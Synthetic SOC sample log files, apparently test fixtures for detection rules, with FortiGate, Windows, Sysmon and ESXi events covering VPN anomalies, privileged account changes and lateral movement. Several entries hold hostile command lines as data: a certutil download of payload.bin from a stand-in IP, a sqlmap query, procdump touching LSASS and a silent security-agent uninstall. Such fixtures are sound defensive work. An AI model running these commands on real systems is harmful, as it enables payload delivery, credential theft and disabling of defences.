sample logs

samples/appendix-a-production-samples.log

+# Appendix A - production-style sample logs
+# Sources: FortiGate traffic/event/vpn style fields, Windows Security event field shapes, SOC Integrator DNS IOC format
+
+# A1-01 DNS IOC traffic
+soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium
+
+# A1-02 DNS IOC domain match
+soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert
+
+# A2-01 Allowed RDP from public IP
+date=2026-03-09 time=10:01:31 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079291 vd="root" logid="0000000013" type="traffic" subtype="forward" level="warning" srcip=91.190.63.84 srcport=55123 dstip=10.20.55.10 dstport=3389 proto=6 action="accept" policyid=3
+
+# A2-02 Firewall admin password changed
+date=2026-03-09 time=10:02:04 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079324 vd="root" logid="0100044547" type="event" subtype="system" level="warning" user="admin" action="password-change" ui="https(10.20.55.1)"
+
+# A2-03 Firewall admin account created
+date=2026-03-09 time=10:02:17 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079337 vd="root" logid="0100044548" type="event" subtype="system" level="warning" user="admin" action="create-admin" target_user="soc-backup-admin"
+
+# A2-04 Notification disabled via config
+date=2026-03-09 time=10:03:41 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079421 vd="root" logid="0100044551" type="event" subtype="system" level="warning" user="admin" action="config-change" config_path="system.alertemail" config_key="email-notify" config_value=disable
+
+# A2-05 Config downloaded
+date=2026-03-09 time=10:04:03 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079443 vd="root" logid="0100044552" type="event" subtype="system" level="notice" user="admin" action="download-config" dstip=10.20.50.33
+
+# A2-06 Multiple critical IPS signatures
+date=2026-03-09 time=10:05:14 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079514 vd="root" logid="0720018432" type="utm" subtype="ips" level="alert" srcip=185.220.101.44 dstip=10.20.55.20 attack="Multiple.Critical.Signatures" action="blocked"
+
+# A2-07 TCP external scan
+date=2026-03-09 time=10:05:50 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079550 vd="root" logid="0419016384" type="utm" subtype="anomaly" level="warning" srcip=45.148.10.9 dstip=10.20.55.20 attack="TCP.Port.Scan" action="detected"
+
+# A2-08 IOC IP indicator detected
+date=2026-03-09 time=10:06:23 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079583 vd="root" logid="0720018433" type="utm" subtype="ips" level="warning" srcip=10.20.55.12 dstip=198.51.100.77 ioc_type=ip ioc_value=198.51.100.77 action="blocked"
+
+# A2-09 Internal scan
+date=2026-03-09 time=10:07:12 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079632 vd="root" logid="0419016385" type="utm" subtype="anomaly" level="warning" srcip=10.20.55.11 dstip=10.20.55.0/24 attack="Internal.Port.Scan" action="detected"
+
+# A2-10 Traffic to known C2
+date=2026-03-09 time=10:07:59 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079679 vd="root" logid="0000000014" type="traffic" subtype="forward" level="warning" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label="known-c2" action="accept"
+
+# A3-01 VPN guest login success
+date=2026-03-09 time=10:10:11 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079811 vd="root" logid="0101037133" type="event" subtype="vpn" tunneltype="ssl" level="warning" action="ssl-login-success" user="guest" srcip=203.0.113.17
+
+# A3-02 VPN success from different country than prior login
+date=2026-03-09 time=10:10:43 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079843 vd="root" logid="0101037135" type="event" subtype="vpn" tunneltype="ssl" level="warning" action="ssl-login-success" user="jane.doe" srcip=198.51.100.20 previous_country=TH current_country=DE
+
+# A3-03 VPN success after failures
+date=2026-03-09 time=10:11:12 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079872 vd="root" logid="0101037135" type="event" subtype="vpn" tunneltype="ssl" level="warning" action="ssl-login-success" user="ops.admin" srcip=198.51.100.42 failed_attempts_before_success=8
+
+# A3-04 Multiple account failures from one source
+date=2026-03-09 time=10:11:49 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079909 vd="root" logid="0101037134" type="event" subtype="vpn" tunneltype="ssl" level="notice" action="ssl-login-fail" srcip=198.51.100.42 failed_accounts=alice,bob,charlie
+
+# A3-05 VPN login from outside expected country
+date=2026-03-09 time=10:12:04 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773079924 vd="root" logid="0101037135" type="event" subtype="vpn" tunneltype="ssl" level="warning" action="ssl-login-success" user="finance.user" srcip=203.0.113.71 expected_country=TH current_country=US
+
+# A4-01 Windows privileged account auth failure
+{"win":{"system":{"eventID":"4625"},"eventdata":{"targetUserName":"admin01"}}}
+# A4-02 Windows service account auth failure
+{"win":{"system":{"eventID":"4625"},"eventdata":{"targetUserName":"svc_backup$"}}}
+# A4-03 AD enumeration tool execution
+{"win":{"system":{"eventID":"4688"},"eventdata":{"newProcessName":"C:\\Tools\\adfind.exe"}}}
+# A4-06 Remote interactive auth success
+{"win":{"system":{"eventID":"4624"},"eventdata":{"logonType":"10","targetUserName":"helpdesk"}}}
+# A4-08 NTLM network logon (pass-the-hash indicator)
+{"win":{"system":{"eventID":"4624"},"eventdata":{"authenticationPackageName":"NTLM","logonType":"3","targetUserName":"it-admin"}}}
+# A4-09 Guest account auth success
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"guest"}}}
+# A4-10 Service account interactive logon
+{"win":{"system":{"eventID":"4624"},"eventdata":{"logonType":"2","targetUserName":"service_sql"}}}
+# A4-12 Account added to privileged domain group
+{"win":{"system":{"eventID":"4728"},"eventdata":{"targetUserName":"new.user","groupName":"Domain Admins"}}}
+# A4-11 Account added to privileged local group
+{"win":{"system":{"eventID":"4732"},"eventdata":{"targetUserName":"new.user","groupName":"Administrators"}}}
+# A4-13 DSRM password set attempt
+{"win":{"system":{"eventID":"4794"},"eventdata":{"targetUserName":"Administrator"}}}
+# A4-21 Domain/local account created
+{"win":{"system":{"eventID":"4720"},"eventdata":{"targetUserName":"ops.newuser"}}}
+# A4-22 Domain/local account re-enabled
+{"win":{"system":{"eventID":"4722"},"eventdata":{"targetUserName":"legacy.disabled"}}}

samples/appendix-b-production-samples.log

+# Appendix B - production-style sample logs
+
+# B1-01 vCenter failed login
+2026-03-09T10:20:31.492Z vcsa01 vpxd[29721]: Event [9023141] [1-1] [vim.event.BadUsernameSessionEvent] [error] [VSPHERE.LOCAL\\administrator] [Login failure for user from 198.51.100.33]
+
+# B1-02 ESXi SSH enabled
+2026-03-09T10:20:55.017Z esxi-01 hostd: User root@127.0.0.1 changed setting: SSH login is enabled
+
+# B1-03 ESXi SSH auth activity
+2026-03-09T10:21:12.161Z esxi-01 sshd[4123010]: Failed password for root from 203.0.113.42 port 53770 ssh2
+2026-03-09T10:21:27.941Z esxi-01 sshd[4123012]: Accepted password for root from 203.0.113.42 port 53811 ssh2
+
+# B2-01 log loss detection from SOC Integrator
+soc_event=correlation event_type=log_loss_detection stream=fortigate expected_min=10 observed=0 window_min=5 severity=warning
+
+# B3-01 Sysmon LSASS access
+{"win":{"system":{"eventID":"10"},"eventdata":{"targetImage":"C:\\Windows\\System32\\lsass.exe","sourceImage":"C:\\Tools\\procdump.exe"}}}
+
+# B3-02 SQLi keywords in process cmdline
+{"win":{"system":{"eventID":"1"},"eventdata":{"commandLine":"cmd.exe /c sqlmap --risk=3 --batch --sql-query=select * from users"}}}
+
+# B3-03 webshell file created
+{"win":{"system":{"eventID":"11"},"eventdata":{"targetFilename":"C:\\inetpub\\wwwroot\\shell.aspx"}}}
+
+# B3-04 security agent uninstall via msiexec
+{"win":{"system":{"eventID":"1"},"eventdata":{"commandLine":"msiexec /x {D23A1B7F-231D-4502-9B00-123456789ABC} /qn"}}}
+
+# B3-05 Task Manager touching LSASS
+{"win":{"system":{"eventID":"10"},"eventdata":{"sourceImage":"C:\\Windows\\System32\\Taskmgr.exe","targetImage":"C:\\Windows\\System32\\lsass.exe"}}}
+
+# B3-06 certutil execution
+{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\certutil.exe","commandLine":"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin"}}}

samples/appendix-c-production-samples.log

+# Appendix C1-C3 - production-style sample logs
+
+# C1-01 candidate impossible travel (FortiGate VPN success with geo context fields)
+date=2026-03-09 time=10:31:00 devname="FGT80F-Branch01" devid="FGT80FTK20000001" eventtime=1773081060 vd="root" logid="0101037135" type="event" subtype="vpn" tunneltype="ssl" action="ssl-login-success" user="analyst01" srcip=203.0.113.71 previous_country=TH current_country=US
+
+# C1-01 confirmed impossible travel from SOC Integrator correlation
+soc_event=correlation event_type=c1_impossible_travel user="analyst01" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18
+
+# C2-01 privileged account auth success
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"admin.soc","logonType":"10"}}}
+
+# C2-02 dormant account activation
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"legacy_user01","logonType":"2"}}}
+
+# C2-03 service account remote interactive logon
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"svc_dbbackup$","logonType":"10"}}}
+
+# C2-04 privilege escalation via local group change
+{"win":{"system":{"eventID":"4732"},"eventdata":{"targetUserName":"john.ops","groupName":"Administrators"}}}
+
+# C3-01 lateral movement indicator (RDP type 10)
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"helpdesk01","logonType":"10"}}}
+# C3-02 lateral movement indicator (SMB type 3)
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"helpdesk01","logonType":"3"}}}
+
+# C3-03 admin account moving laterally
+{"win":{"system":{"eventID":"4624"},"eventdata":{"targetUserName":"admin-core","logonType":"3"}}}